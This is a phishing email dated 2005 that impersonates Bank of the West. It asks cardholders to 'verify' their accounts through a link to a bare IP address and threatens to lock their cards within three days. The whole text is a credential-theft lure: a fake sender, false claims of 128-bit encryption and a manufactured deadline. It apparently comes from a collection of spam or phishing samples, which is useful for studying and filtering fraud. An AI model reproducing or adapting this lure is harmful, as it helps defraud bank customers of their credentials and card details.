Subject: Attention Bank of the West Cardholder

From: "[email-masked]" <[email-masked]>
Date: Tue, 30 Aug 2005 16:54:02 +0100

Dear Bank of the West Member,

As part of our continuing commitment to protect your account and 
to reduce the instance of fraud on our website, we are undertaking 
a period review of our member accounts.

You are requested to visit our new site, and fill in the required information.
Click the link below:
http://203.149.3.242/bankofthewest/
This site is our new verify site,encrypted with 128bits encryption

This is required for us to continue to offer you a safe and risk 
free environment to send and receive money online and maintain 
the experience.You have 3 days to enter required information or 
your credit card will be locked.

Thank you,

Sincerely,
Bank of the West Online Banking Customer Service

As outlined in our User Agreement, Bank of the West will periodically 
send you information about site changes and enhancements. Visit 
our Privacy Policy and User Agreement if you have any questions.